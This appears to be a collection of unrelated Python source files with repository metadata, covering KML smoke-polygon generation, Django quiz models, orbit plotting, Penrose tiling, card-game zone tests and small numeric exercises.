XSL_LAST_PART = r"""<xsl:apply-templates />
</xsl:copy>
</xsl:template>
<xsl:template match="kml:Placemark">
<xsl:copy>
<xsl:copy-of select="@*" />
<styleUrl><xsl:value-of select="./kml:ExtendedData/kml:SchemaData/kml:SimpleData[@name='Category']" /></styleUrl>
<xsl:apply-templates />
</xsl:copy>
</xsl:template>
</xsl:stylesheet>
"""
POLYGONS_CONFIG_SECTION = 'PolygonsKML'
# TODO: pass in individual values from confif rather than config itself.
def __init__(self, config, parameter):
self._config = config
self._parameter = parameter
# TODO: support multiple color schemes
self._color_bar_section = self._config.get(self.POLYGONS_CONFIG_SECTION, 'POLYGON_COLORS').split(',')[0]
self._create_output_dir()
self._import_grid()
self._generate_custom_cutpoints_file()
self._generate_custom_xsl_files()
self._generate_kmls()
self._generate_legend()
def _create_output_dir(self):
self.output_dir = self._config.get(self.POLYGONS_CONFIG_SECTION,
'POLYGONS_OUTPUT_DIR').rstrip('/') + '-' + self._parameter.lower()
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
def _import_grid(self):
self._infile = self._config.get('DispersionGridInput', "FILENAME")
self._makepolygons_infile = "NETCDF:%s:%s" % (self._infile, self._parameter)
self._grid = BSDispersionGrid(self._infile, param=self._parameter) # dispersion grid instance
def _generate_custom_cutpoints_file(self):
self._custom_cutpoints_filename = os.path.join(self.output_dir, 'CutpointsGateway.csv')
newfile = open(self._custom_cutpoints_filename, 'w')
newfile.write("Name,Threshold\n")
levels = [s for s in self._config.get(self._color_bar_section, "DATA_LEVELS").split()]
for i in range(len(levels)):
newfile.write("Cat%d,%s\n" % (i, levels[i]))
newfile.close()
def _generate_custom_xsl_files(self):
self._custom_xsl_filename = os.path.join(self.output_dir, 'KMLPolygonStyleGateway.xsl')
newfile = open(self._custom_xsl_filename, 'w')
newfile.write(self.XSL_FIRST_PART)
hex_colors = self._parse_colors()
for i in range(len(hex_colors)):
if hex_colors[i] == '000000':
color_str = '00000000'
fill_str = '0'
else:
color_str = '99%s' % (hex_colors[i])
fill_str = '1'
newfile.write(self.XSL_STYLE_ELEMENT % ("Cat%d" % (i), color_str, fill_str))
newfile.write(self.XSL_LAST_PART)
newfile.close()
def _parse_colors(self):
if self._config.getboolean(self._color_bar_section, "DEFINE_RGB"):
r = [int(s) for s in self._config.get(self._color_bar_section, "RED").split()]
g = [int(s) for s in self._config.get(self._color_bar_section, "GREEN").split()]
b = [int(s) for s in self._config.get(self._color_bar_section, "BLUE").split()]
if not len(r) == len(g) == len(b):
raise Exception("Configuration ERROR... RED, GREEN, BLUE must specify same number of values.")
# kml colors are specified as 'aabbggrr' (where 'aa' is the alpha value)
return ['%02x%02x%02x' % (b[i], g[i], r[i]) for i in range(len(r))]
elif self._config.getboolean(self._color_bar_section, "DEFINE_HEX"):
return [s.strip('#') for s in self._config.get(self._color_bar_section, "HEX_COLORS").split()]
else:
raise Exception("Configuration ERROR... DEFINE_RGB or HEX_COLORS must be true.")
def _generate_kmls(self):
self._kml_file_basename, ext = os.path.splitext(os.path.basename(self._infile))
dfu.create_polygon_kmls_dir(self._config, self._parameter)
self.kml_files = []
# def my_output_handler(logger, output, is_stderr):
# logger.log(OUTPUT, output)
for i in range(self._grid.num_times):
try:
self._generate_kml(i)
except:
break
def _generate_kml(self, i):
dt = self._grid.datetimes[i] - timedelta(hours=1)
band = i + 1
#self.log.debug("Processing %s band %2d: %s...", name, band, dt.strftime("%Y-%m-%d %HZ"))
#kmlfile = dt.strftime(name + "_%Y%m%d%H.kml")
kmlfile = self._kml_file_basename + str(band) + ".kml"
poly_file = os.path.join(self.output_dir, kmlfile)
#self.log.debug("Opened poly_file %s", poly_file)
args = [
self._config.get(self.POLYGONS_CONFIG_SECTION, "MAKEPOLYGONS_BINARY"),
"-in=" + self._makepolygons_infile,
"-band=" + str(band),
"-cutpoints=" + os.path.abspath(self._custom_cutpoints_filename),
"-format=KML",
"-kmlStyle=" + self._custom_xsl_filename,
"-out=" + poly_file
]
if subprocess.call(' '.join(args), shell=True) != 0:
msg = "Failure while trying to create %s" % (poly_file)
#self.log.error(msg)
raise RuntimeError(msg)
self.kml_files.append((kmlfile, dt))
LEGEND_FILENAME_ROOT = 'colorbar_polygons'
def _generate_legend(self):
plot = create_color_plot(self._config, self._parameter, self._grid,
self._color_bar_section)
root_w_parameter = "{}_{}".format(self._parameter.lower(),
self.LEGEND_FILENAME_ROOT)
plot.make_colorbar(os.path.join(self.output_dir, root_w_parameter))
self.legend_filename = "%s.%s" % (root_w_parameter, plot.export_format)
|
pnwairfire/blueskykml
|
blueskykml/polygon_generator.py
|
polygon_generator.py
|
py
| 7,736 |
python
|
en
|
code
| 0 |
github-code
|
6
|
74992294908
|
from django.core.exceptions import ValidationError
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils.translation import gettext_lazy as _
from django.contrib.postgres.fields import ArrayField
from udemy.apps.core.models import TimeStampedBase, OrderedModel, CreatorBase
from udemy.apps.course.models import Course
from udemy.apps.module.models import Module
from udemy.apps.quiz.annotations import QuizAnnotations
class Quiz(TimeStampedBase, OrderedModel):
title = models.CharField(_('Title'), max_length=200)
description = models.TextField(_('Description'))
is_published = models.BooleanField(default=False)
is_draft = models.BooleanField(default=True)
is_timed = models.BooleanField(default=False)
pass_percent = models.PositiveIntegerField(validators=[MaxValueValidator(100)])
module = models.ForeignKey(
Module,
related_name='quizzes',
on_delete=models.CASCADE,
)
course = models.ForeignKey(
Course,
related_name='quizzes',
on_delete=models.CASCADE,
)
order_in_respect = ('course', 'module')
annotation_class = QuizAnnotations()
class Question(TimeStampedBase, OrderedModel):
question = models.TextField()
feedback = models.TextField()
answers = ArrayField(models.TextField())
max_time = models.PositiveIntegerField(default=0)
quiz = models.ForeignKey(
Quiz,
related_name='questions',
on_delete=models.CASCADE
)
course = models.ForeignKey(
Course,
related_name='questions_quiz',
on_delete=models.CASCADE,
)
correct_response = models.IntegerField(validators=[MinValueValidator(1)])
order_in_respect = ('quiz',)
def save(self, *args, **kwargs):
if self.correct_response > len(self.answers):
raise ValidationError({'correct_response': 'invalid response'})
super().save(*args, **kwargs)
class QuizRelation(CreatorBase, TimeStampedBase):
quiz = models.ForeignKey(Quiz, on_delete=models.CASCADE)
done = models.BooleanField(default=False)
class Meta:
constraints = [
models.UniqueConstraint(fields=('creator', 'quiz'), name='unique quiz relation')]
|
gabrielustosa/udemy-old
|
udemy/apps/quiz/models.py
|
models.py
|
py
| 2,272 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34465989712
|
import math
import numpy as np
import pandas as pd
n = 10
x = np.random.randint(0, 50, n)
y = np.random.randint(0, 50, n)
lista = []
listb = []
listc = []
for i in range(n-1):
for j in range(i+1, n):
lista.append((x[i]-x[j])*(x[i]-x[j]))
listb.append((y[i]-y[j])*(y[i]-y[j]))
for i in range(len(lista)):
listc.append(math.sqrt(lista[i]+listb[i]))
print(listc)
# 2
listd = []
x = np.random.randint(0, 50, [n, 2])
y = np.zeros([n, n])
for i in range(n):
for j in range(i, n):
y[i, j] = y[j, i] = np.sqrt(np.sum((x[i]-x[j])**2))
y = y.round(2)
print(y)
|
lmyljjljh/shujufenxi
|
sjcjyfx/20221111b.py
|
20221111b.py
|
py
| 587 |
python
|
en
|
code
| 1 |
github-code
|
6
|
7241271696
|
####################
# Joint distribution of Ask/Bid Qty
####################
import os
import pickle
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import axes3d
data_directory = 'data/xFGBL'
img_directory = 'images/'
data_file = 'xFGBL20130702.pkl'
for fn in os.listdir(data_directory):
with open(os.path.join(data_directory, fn), 'rb') as input:
r=pickle.load(input)
X = r['AskQty']
Y = r['BidQty']
bins = np.arange(0, 600, 20)
hist, xedges, yedges = np.histogram2d(Y, X, bins=bins, normed=True)
fig = plt.figure()
fig.suptitle(fn, fontsize=20)
ax = fig.add_subplot(111, projection='3d')
elements = (len(xedges) - 1) * (len(yedges) - 1)
X, Y = np.meshgrid(xedges[:-1]+0.25, yedges[:-1]+0.25)
ax.plot_wireframe(X, Y, hist)
# xpos = X.flatten()
# ypos = Y.flatten()
# zpos = np.zeros(elements)
# dx = 10 * np.ones_like(zpos)
# dy = dx.copy()
# dz = hist.flatten()
#ax.bar3d(xpos, ypos, zpos, dx, dy, dz, color='b', zsort='average')
#ax.scatter(xpos, ypos, dz)
#plt.show()
plt.savefig(os.path.join(img_directory, fn + '.png'))
|
maroxe/SchoolProjects
|
EA/joint_distribution.py
|
joint_distribution.py
|
py
| 1,286 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73783427069
|
'''
File containing the PlottingCalculator class
'''
import numpy as np
import math
from pyrigee.orbit import *
'''
The PlottingCalculator class contains functions that calculate coordinates for plotting
things. Used to reduce the amount of code in the OrbitPlotter class.
'''
class PlottingCalculator:
# The number of divisions in wireframe plots for bodies
__PLANET_DIVS = 9j
# The number of divisions in orbit plots
__ORBIT_DIVS = 61
def __init__(self, t):
self.__tick_value = t
'''
Calculates the x, y, z coordinates of a sphere. Used to plot the body defined by the user. Takes
the scaled radius, or the radius of the body scaled to the graph's tick units
'''
def calculate_body_coords(self, scaled_radius):
# Create theta and phi values that run from 0 to 2pi and 0 to pi, respectively
theta, phi = np.mgrid[0:2 * np.pi:self.__PLANET_DIVS, 0:np.pi:self.__PLANET_DIVS]
'''
Calculate x, y, and z of sphere given theta and phi ranges. Divide each radius by tick value to make sure
that the units are correct when displayed
'''
x = scaled_radius * np.cos(theta) * np.sin(phi)
y = scaled_radius * np.sin(theta) * np.sin(phi)
z = scaled_radius * np.cos(phi)
return (x, y, z)
'''
Calculates the coordinates of an elliptical orbit. Takes the orbits inclination, eccentricty, and semi-major axis.
The transfer flag indicates whether or not this is a transfer orbit, in which case only half the orbit will be
calculated. negative indicates whether or not the orbit should be flipped. Returns the x, y, z coords of the
elliptical orbit scaled by __tick_value
'''
def calculate_elliptical_orbit_coords(self, inclination, eccentricity, semi_major_axis, transfer, negative):
# Number to multiply by pi by when bounding np.linepace. Default is -2 to plot an entire polar coordinate
pi_multiplier = -2
# If user only wants to plot half the orbit, change pi multiplier to -1, so that np.linspace goes from 0 to pi
if transfer:
pi_multiplier = -1
theta = np.linspace(pi_multiplier * np.pi, 0, self.__ORBIT_DIVS)
# Convert inclination to radians
inclination = np.radians(inclination)
# Polar equation of ellipse
r = (semi_major_axis * (1 - eccentricity**2)) / (1 - eccentricity * np.cos((theta)))
# Flip orbit if negative flag is true
if negative:
r *= -1
# Convert polar equations to cartesean coords based on the given orbital inclination
x = r * np.cos(theta) * np.cos(inclination)
y = r * np.sin(theta)
z = x * np.tan(inclination)
# Return the scaled coordinates of the elliptical orbit
return self.calculate_scaled_coords(x, y, z)
'''
Calculates the coordinates of a parabolic orbit. Takes an orbit object representing the orbit and the radius of the
body being orbited. Returns the x, y, z coords of the orbit scaled by __tick_value
'''
def calculate_parabolic_orbit_coords(self, orbit, body_radius):
# Create theta value for periodic plotting
theta = np.linspace(0, 2 * np.pi, self.__ORBIT_DIVS)
# Polar equation of ellipse
r = ((orbit.perigee) * 2 + (body_radius * 2)) / (1 - np.cos(theta))
# Convert polar equations to cartesean coords based on the given orbital inclination
x = r * np.cos(theta) * np.cos(np.radians(orbit.inclination))
y = r * np.sin(theta)
z = r * np.sin(np.radians(orbit.inclination)) * np.cos(theta)
# Return the scaled coordinates of the parabolic orbit
return self.calculate_scaled_coords(x, y, z)
'''
Calculates the coordinates of the ascending node. Takes the radius of the body being orbited, the orbits
inclination, the apogee, and the perigee/ Returns the coordinates scaled by __tick_value
'''
def calculate_ascending_node_coords(self, body_radius, inclination, apogee, perigee):
# Calculate the apoapsis/periapsis (distances from center of mass) of target orbit where inclination arrow will be plotted
apoapsis = apogee + body_radius
periapsis = perigee + body_radius
# Calculate ascending node height
ascending_node_height = math.sqrt(apoapsis * periapsis)
# Return the scaled coordinates of the inclination change arrow
return self.calculate_scaled_coords(0, -ascending_node_height, 0)
'''
Calculates the coordinates of the apogee text annotation. Takes the x, y, and z coordinates of the orbit, each
as a list of numbers
'''
def calculate_apogee_text_coords(self, x, y, z):
# Get coordinates of apogee text
apogee_x = x[0]
apogee_y = y[0]
apogee_z = z[0]
return (apogee_x, apogee_y, apogee_z)
'''
Calculates the coordinates of the perigee text annotation. Takes the x, y, and z coordinates of the orbit, each
as a list of numbers
'''
def calculate_perigee_text_coords(self, x, y, z):
# Index of orbit coordinates of the orbit's perigee
perigee_coord_index = int(x.size / 2)
# Get coordinates of perigee text
perigee_x = x[perigee_coord_index]
perigee_y = y[perigee_coord_index]
perigee_z = z[perigee_coord_index]
return (perigee_x, perigee_y, perigee_z)
'''
Takes three lists, each representing x, y, and z coordinates, respectively. Returns these coordinates scaled
by __tick_value
'''
def calculate_scaled_coords(self, x, y, z):
return (x / self.__tick_value, y / self.__tick_value, z / self.__tick_value)
'''
Calculates the orbit, eccentricity, and semi-major axis of the transfer orbit. The transfer orbit is the elliptical
orbit that transitions from one circular orbit to another. Takes the initial orbit, the target orbit, and the radius
of the body being orbited
'''
def calculate_transfer_orbit_elements(self, initial_orbit, target_orbit, body_radius):
# Calculate apogee, perigee, apoapsis, and periapsis of the transfer orbit
transfer_apogee = target_orbit.apogee
transfer_perigee = initial_orbit.perigee
transfer_apoapsis = transfer_apogee + body_radius
transfer_periapsis = transfer_perigee + body_radius
# Calculate semi-major axis of transfer orbit
transfer_semi_major_axis = (transfer_apoapsis + transfer_periapsis) / 2
# Calculate eccentricity of transfer orbit
transfer_eccentricity = (transfer_apoapsis - transfer_periapsis) / (transfer_apoapsis + transfer_periapsis)
# Variable to hold the inclination of the transfer orbit
transfer_inclination = 0
'''
Determine whether the initial or target orbit is the higher one, and set the transfer inclination as needed.
The transfer orbit will be plotted to show path taken either before or after an inclination change, whichever
is most efficient
'''
if initial_orbit.apogee > target_orbit.apogee:
transfer_inclination = target_orbit.inclination
else:
transfer_inclination = initial_orbit.inclination
# If the transfer apogee < transfer perigee (such as when maneuvering from higher orbit to a lower orbit), flip the values
if transfer_apogee < transfer_perigee:
temp = transfer_apogee
transfer_apogee = transfer_perigee
transfer_perigee = temp
# Return a new orbit that represents the elliptical transfer orbit, the transfer eccentricity, and the transfer semi-major axis
return (Orbit(transfer_apogee, transfer_perigee, transfer_inclination), transfer_eccentricity, transfer_semi_major_axis)
'''
Calculates the orbit, eccentricity, and semi-major axis of the in-between orbit. The in-between orbit is the orbit the
spacecraft will be in after an inclination change to show how the spacecraft will transition between inclination changes
and Hohmann transfer orbits. Takes the initial orbit, the target orbit, and the radius of the body being orbited
'''
def calculate_in_between_orbit_elements(self, initial_orbit, target_orbit, body_radius):
# Variables to hold in-between apogee and perigee
in_between_apogee = 0
in_between_perigee = 0
# Variable to hold inclination of the in-between orbit
in_between_inclination = 0
# If maneuver shrinks the orbit
if initial_orbit.apogee > target_orbit.apogee:
in_between_apogee = initial_orbit.apogee
in_between_perigee = initial_orbit.perigee
in_between_inclination = target_orbit.inclination
# If the maneuver expands the orbit
else:
in_between_apogee = target_orbit.apogee
in_between_perigee = target_orbit.perigee
in_between_inclination = initial_orbit.inclination
# Calculate in-between orbit apsis
in_between_apoapsis = in_between_apogee + body_radius
in_between_periapsis = in_between_perigee + body_radius
# Calculate eccentricity of in-between orbit
in_between_eccentricity = (in_between_apoapsis - in_between_periapsis) / (in_between_apoapsis + in_between_periapsis)
# Calculate semi-major axis of in-between orbit
in_between_semi_major_axis = (in_between_apoapsis + in_between_periapsis) / 2
# Return a new orbit that represents the in-between orbit, the in-between eccentricity, and the in-between semi-major axis
return (Orbit(in_between_apogee, in_between_perigee, in_between_inclination), in_between_eccentricity, in_between_semi_major_axis)
|
JackCSheehan/pyrigee
|
pyrigee/plotting_calculator.py
|
plotting_calculator.py
|
py
| 9,801 |
python
|
en
|
code
| 9 |
github-code
|
6
|
23099951540
|
from random import random
def check(number,list):
if number in list:
return False
else:
return True
list =[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
def func(i,list):
index = int(random()*10)
if index <= len(list)-1:
cleaner = list[i]
list[i]= list[index]
list[index]=cleaner
for i in list:
func(i,list)
print(list)
|
gochicus/python-learning
|
lesson-2/ex5.py
|
ex5.py
|
py
| 382 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70084638589
|
from sklearn.cluster import KMeans
import numpy as np
import matplotlib.pyplot as plt
# X = np.array([[1, 2], [1, 4], [1, 0], [10, 2], [10, 4], [10, 0]])
X = np.array(np.random.random((100, 2)))
kmeans = KMeans(n_clusters=2).fit(X)
print('Labels')
print(kmeans.labels_)
result = kmeans.predict([[0, 0], [12, 3]])
print('result')
print(result)
print('clusters')
print(kmeans.cluster_centers_)
plt.scatter(X[:, 0], X[:, 1], c=kmeans.labels_)
plt.xlabel("X")
plt.ylabel("Y")
plt.show()
|
bpark/ml-demos
|
simple_kmeans.py
|
simple_kmeans.py
|
py
| 486 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31624687973
|
import math
import numpy as np
PSI = (math.sqrt(5) - 1) / 2
PSI_2 = 1 - PSI
TOL = 1.e-5
class Triangle:
def __init__(self, v1, v2, v3):
self.v1 = v1
self.v2 = v2
self.v3 = v3
def path(self, opacity, fill_color):
side_l, side_r = self.v2 - self.v1, self.v3 - self.v2
# MOVE TO
d = "m {}, {} ".format(self.v1[0], self.v1[1])
# LINE TO
d += "l {}, {} ".format(side_l[0], side_l[1])
d += "l {}, {} ".format(side_r[0], side_r[1])
# LINE TO, CLOSE PATH
d += "l {}, {}z".format(-side_l[0], -side_l[1])
return '<path fill="{}" opacity="{}" d="{}"/>'.format(fill_color, opacity, d)
def dotted(self, stroke_width, stroke_color="black", tile_color="black", radius=0.1):
svg_circle = lambda point: '<circle cx="{}" cy="{}" r="{}" stroke="{}" stroke-width="{}" fill="{}" />\n'.format(point[0], point[1], radius, stroke_color, stroke_width, tile_color)
side_l, side_r = self.v2 - self.v1, self.v3 - self.v2
d = svg_circle(self.v1)
d += svg_circle(side_l)
d += svg_circle(side_r)
d += svg_circle(-side_l)
return d
@property
def center(self):
return (self.v1 + self.v3)/2
def mirror(self):
v1 = np.array([self.v1[0], -self.v1[1]])
v2 = np.array([self.v2[0], -self.v2[1]])
v3 = np.array([self.v3[0], -self.v3[1]])
return self.__class__(v1, v2, v3)
class Fatty(Triangle):
def split(self):
s1 = PSI_2 * self.v1 + PSI * self.v3
s2 = PSI_2 * self.v1 + PSI * self.v2
return (Fatty(s1, s2, self.v1),
Tiny(s2, s1, self.v2),
Fatty(self.v3, s1, self.v2))
class Tiny(Triangle):
def split(self):
s1 = PSI * self.v1 + PSI_2 * self.v2
return (Tiny(s1, self.v3, self.v1),
Fatty(self.v3, s1, self.v2))
class Tiling:
def __init__(self, initial=None, depth = 5, scale = 100, mirror=True):
"""Tiling manager class.
Args:
initial (list of `Triangle`, optional): The initial tiling. Defaults to None.
"""
if initial is None or initial == "rombus":
theta = 2 * math.pi / 5
rot = np.array([math.cos(theta), math.sin(theta)])
v1 = np.array([-scale / 2, 0])
v2 = scale / 2 * rot
v3 = np.array([scale / 2 / PSI, 0])
initial = [Fatty(v1, v2, v3)]
elif initial == "hexagon":
theta = math.pi / 5
alpha = math.cos(theta)
rot = np.array([math.cos(theta), math.sin(theta)])
v1 = np.array([scale, 0])
c = np.array([0, 0])
u1 = u2 = np.array([v1[0]*rot[0]-v1[1]*rot[1], v1[0]*rot[1]+v1[1]*rot[0]])
v2 = v3 = np.array([u1[0]*rot[0]-u1[1]*rot[1], u1[0]*rot[1]+u1[1]*rot[0]])
u3 = u4 = np.array([v3[0]*rot[0]-v3[1]*rot[1], v3[0]*rot[1]+v3[1]*rot[0]])
v4 = v5 = np.array([u4[0]*rot[0]-u4[1]*rot[1], u4[0]*rot[1]+u4[1]*rot[0]])
u5 = -v1
initial = [
Tiny(v1, c, u1),
Tiny(v2, c, u2),
Tiny(v3, c, u3),
Tiny(v4, c, u4),
Tiny(v5, c, u5)
]
self.tiling = initial
self.depth = depth
self.mirror = mirror
self.scale = scale
self._create(depth, mirror)
def _create(self, depth, mirror):
# Cut the tiles recursively
for _ in range(depth):
new_tiling = []
for tile in self.tiling:
new_tiling.extend(tile.split())
self.tiling = new_tiling
# Mirror the tiling along the x-Axis
if mirror:
self.tiling.extend([tile.mirror() for tile in self.tiling])
def to_svg(self, filepath, dotted=False, width=0.005, margin=1.05, fill_color="white", stroke_color="black", radius=.0005):
stroke_width = str(PSI ** self.depth * self.scale * width)
# Create viewport
xmin = ymin = - self.scale * margin
width = height = 2 * self.scale * margin
viewbox ='{} {} {} {}'.format(xmin, ymin, width, height)
svg = ['<?xml version="1.0" encoding="utf-8"?>']
svg.append('<svg width="100%" height="100%" viewBox="{}"'.format(viewbox))
svg.append(' preserveAspectRatio="xMidYMid meet" version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">')
# Elements container
svg.append('<g style="stroke:{}; stroke-width: {};">'.format(stroke_color, stroke_width))
# Generates elements
if dotted:
for tile in self.tiling:
svg.append(tile.dotted(stroke_width, stroke_color, fill_color, .0005))
else:
for tile in self.tiling:
svg.append(tile.path(1, fill_color))
svg.append('</g>\n</svg>')
svg = '\n'.join(svg)
filepath = "{}_{}_{}".format(filepath, self.depth, width)
with open(filepath, 'w') as fo:
fo.write(svg)
if __name__ == "__main__":
t1 = Tiling(initial="hexagon", depth=8, scale=400)
t1.to_svg("output/rose", fill_color="pink", dotted=True, width=0.4)
# print_svg("penrose_2_3.svg", intial_tiling=t2, depth=2, base_width=.3)
# print_svg_dotted("penrose_dotted_9_3.svg", intial_tiling=t2, scale=scale, depth=9, base_width=.05)
|
RCoanda/rosey
|
base.py
|
base.py
|
py
| 5,459 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73928012028
|
import collections
import random
import unittest
import mock
from cardboard import card as c, events, zone as z
from cardboard.tests.util import GameTestCase
from cardboard.util import ANY
ENTER, LEAVE = events.ENTERED_ZONE, events.LEFT_ZONE
class ZoneTest(GameTestCase):
card = mock.Mock(spec=c.Card)
def setUp(self):
super(ZoneTest, self).setUp()
self.u = z.UnorderedZone(
name="Emerald Hill", game=self.game, contents=self.library,
)
self.o = z.OrderedZone(
name="Casino Night", game=self.game, contents=self.library,
)
class TestZones(ZoneTest):
def test_name(self):
self.assertEqual(self.u.name, "Emerald Hill")
self.assertEqual(self.o.name, "Casino Night")
def test_ordered(self):
self.assertFalse(self.u.ordered)
self.assertTrue(self.o.ordered)
def test_str_repr(self):
self.assertEqual(str(self.u), "Emerald Hill")
self.assertEqual(str(self.o), "Casino Night")
self.assertEqual(repr(self.u), "<Zone: Emerald Hill>")
self.assertEqual(repr(self.o), "<Zone: Casino Night>")
def test_contains(self):
for i in self.library:
self.assertIn(i, self.u)
self.assertIn(i, self.o)
self.assertNotIn(object(), self.u)
self.assertNotIn(object(), self.o)
def test_iter(self):
self.assertEqual(set(self.u), set(self.library))
self.assertEqual(list(self.o), self.library)
def test_len(self):
self.assertEqual(len(self.u), len(self.library))
self.assertEqual(len(self.o), len(self.library))
def test_add(self):
with self.assertTriggers(event=ENTER, card=30, zone=self.u):
self.u.add(30)
with self.assertTriggers(event=ENTER, card=30, zone=self.o):
self.o.add(30)
self.assertEqual(set(self.u), set(self.library) | {30})
self.assertEqual(list(self.o), self.library + [30])
def test_add_already_contains(self):
NO_OWNER, OWNER = "on the {}", "in {}'s {}"
u, o = self.u.name, self.o.name
n = mock.Mock()
self.u.add(n)
self.o.add(n)
self.resetEvents()
with self.assertRaisesRegexp(ValueError, NO_OWNER.format(u)):
self.u.add(n)
with self.assertRaisesRegexp(ValueError, NO_OWNER.format(o)):
self.o.add(n)
with self.assertRaisesRegexp(ValueError, OWNER.format(n.owner, u)):
self.u.owner = n.owner
self.u.add(n)
with self.assertRaisesRegexp(ValueError, OWNER.format(n.owner, o)):
self.o.owner = n.owner
self.o.add(n)
# wasn't added twice nor removed
self.assertIn(self.library[0], self.u)
self.assertEqual(self.o.count(self.library[0]), 1)
self.assertFalse(self.events.trigger.called)
def test_add_owner_redirection(self):
"""
Adding a card with a different owner than the zone's redirects.
"""
card = mock.Mock()
self.u.name, self.o.name = "foo", "bar"
self.u.owner, self.o.owner = mock.Mock(), mock.Mock()
self.u.add(card)
self.o.add(card)
card.owner.foo.add.assert_called_once_with(card)
card.owner.bar.add.assert_called_once_with(card)
def test_move(self):
self.o.add(self.card)
self.card.zone = self.o # on actual cards this is a property
with self.assertTriggers(event=ENTER, card=self.card, zone=self.u):
self.u.move(self.card)
self.card.zone = self.u
self.assertIn(self.card, self.u)
with self.assertTriggers(event=ENTER, card=self.card, zone=self.o):
self.o.move(self.card)
self.assertIn(self.card, self.o)
def test_move_to_self(self):
self.resetEvents()
# shouldn't even be checking library[0].zone
with self.assertRaises(ValueError):
self.u.move(self.library[0])
with self.assertRaises(ValueError):
self.o.move(self.library[0])
# wasn't added twice nor removed
self.assertIn(self.library[0], self.u)
self.assertEqual(self.o.count(self.library[0]), 1)
self.assertFalse(self.events.trigger.called)
def test_pop(self):
self.resetEvents()
e = self.u.pop()
self.assertLastEventsWere([dict(event=LEAVE, card=e, zone=self.u)])
self.resetEvents()
f = self.o.pop()
self.assertLastEventsWere([dict(event=LEAVE, card=f, zone=self.o)])
self.assertEqual(set(self.u), set(self.library) - {e})
self.assertEqual(list(self.o), self.library[:-1])
def test_remove(self):
e = self.library[-7]
self.library.remove(e)
with self.assertTriggers(event=LEAVE, card=e, zone=self.u):
self.u.remove(e)
with self.assertTriggers(event=LEAVE, card=e, zone=self.o):
self.o.remove(e)
self.assertEqual(set(self.u), set(self.library))
self.assertEqual(list(self.o), self.library)
self.assertRaises(ValueError, self.u.remove, object())
self.assertRaises(ValueError, self.o.remove, object())
def test_update(self):
self.u.update(range(4))
for i in range(4):
self.assertIn(i, self.u)
self.assertEqual(len(self.u), len(self.library) + 4)
evs = [dict(event=ENTER, card=i, zone=self.u) for i in range(4)]
self.assertLastEventsWere(evs)
self.resetEvents()
self.o.update(range(4))
self.assertEqual(self.o[-4:], range(4))
self.assertEqual(len(self.o), len(self.library) + 4)
evs = [dict(event=ENTER, card=i, zone=self.o) for i in range(4)]
self.assertLastEventsWere(evs)
def test_silent(self):
self.o.add(self.card)
self.card.zone = self.o
self.resetEvents()
self.u.add(20, silent=True)
self.o.add(20, silent=True)
self.u.remove(self.library[0], silent=True)
self.o.remove(self.library[0], silent=True)
self.u.pop(silent=True)
self.o.pop(silent=True)
self.u.move(self.card, silent=True)
self.card.zone = self.u
self.o.move(self.card, silent=True)
self.u.update(range(10), silent=True)
self.o.update(range(10), silent=True)
self.assertFalse(self.events.trigger.called)
def test_iterable(self):
i = range(10)
# TODO: This is incomplete, all the methods don't take iterables
o = z.OrderedZone(game=None, name="Emerald Hill", contents=i)
u = z.UnorderedZone(game=None, name="Emerald Hill", contents=i)
i.pop()
self.assertEqual(list(o), range(10))
self.assertEqual(list(u), range(10))
class TestOrderedZone(ZoneTest):
def test_reversed(self):
self.assertEqual(list(reversed(self.o)), list(reversed(self.library)))
def test_getitem(self):
for i, e in enumerate(self.library):
self.assertEqual(self.o[i], e)
self.assertEqual(self.o[2:7:2], self.library[2:7:2])
def test_set_del_item(self):
self.assertRaises(AttributeError, getattr, self.o, "__setitem__")
self.assertRaises(AttributeError, getattr, self.o, "__delitem__")
def test_count(self):
o = z.OrderedZone(game=None, name="Emerald Hill",
contents=[1, 1, 1, 2, 2, 3])
for i, e in enumerate(range(3, 0, -1), 1):
self.assertEqual(o.count(e), i)
def test_index(self):
e = self.library[4]
self.assertEqual(self.o.index(e), 4)
def test_pop_index(self):
e1 = self.o.pop(0)
e2 = self.o.pop(4)
self.library.pop(0)
self.library.pop(4)
self.assertEqual(list(self.o), self.library)
self.assertLastEventsWere([
{"event" : LEAVE, "card" : e1, "zone" : self.o},
{"event" : LEAVE, "card" : e2, "zone" : self.o},
])
def test_reverse(self):
self.o.reverse()
self.assertEqual(list(self.o), list(reversed(self.library)))
def test_shuffle(self):
with mock.patch("cardboard.zone.random.shuffle") as shuffle:
self.o.shuffle()
shuffle.assert_called_once_with(self.o._order)
class TestZone(unittest.TestCase):
def test_zone(self):
c = mock.Mock()
for zone in ["battlefield", "exile", "hand"]:
n = z.zone[zone](game=None, contents=[c])
self.assertIsInstance(n, z.UnorderedZone)
self.assertEquals(n.name, zone)
self.assertIn(c, n)
for zone in ["graveyard", "library", "stack"]:
n = z.zone[zone](game=None, contents=[c])
self.assertIsInstance(n, z.OrderedZone)
self.assertEquals(n.name, zone)
self.assertIn(c, n)
|
Julian/cardboard
|
cardboard/tests/test_zone.py
|
test_zone.py
|
py
| 8,874 |
python
|
en
|
code
| 7 |
github-code
|
6
|
36821141161
|
from math import ceil
import time
def add_up_version1(list_numbers, number):
half = ceil(number/2)
pairs = []
for item in range(half):
temp = []
temp.append(item)
temp.append(number - item)
pairs.append(temp)
for item in pairs:
if item[0] in list_numbers and item[1] in list_numbers:
return True
return False
def add_up_version2(list_numbers, number):
for item in range(len(list_numbers)):
temp_list = list_numbers.copy()
temp_number = temp_list.pop(item)
for num in temp_list:
if temp_number + num == number:
return True
return False
def main():
start_time = time.time()
print(add_up_version1([10, 15, 3, 7], 17))
print(add_up_version1([1, 2, 3, 4], 3))
print(add_up_version1([1, 2, 3, 4], 4))
print(add_up_version1([1, 2, 3, 4], 10))
end_time = time.time()
print(end_time - start_time)
start_time = time.time()
print(add_up_version2([10, 15, 3, 7], 17))
print(add_up_version2([1, 2, 3, 4], 3))
print(add_up_version2([1, 2, 3, 4], 4))
print(add_up_version2([1, 2, 3, 4], 10))
end_time = time.time()
print(end_time - start_time)
if __name__ == "__main__":
main()
|
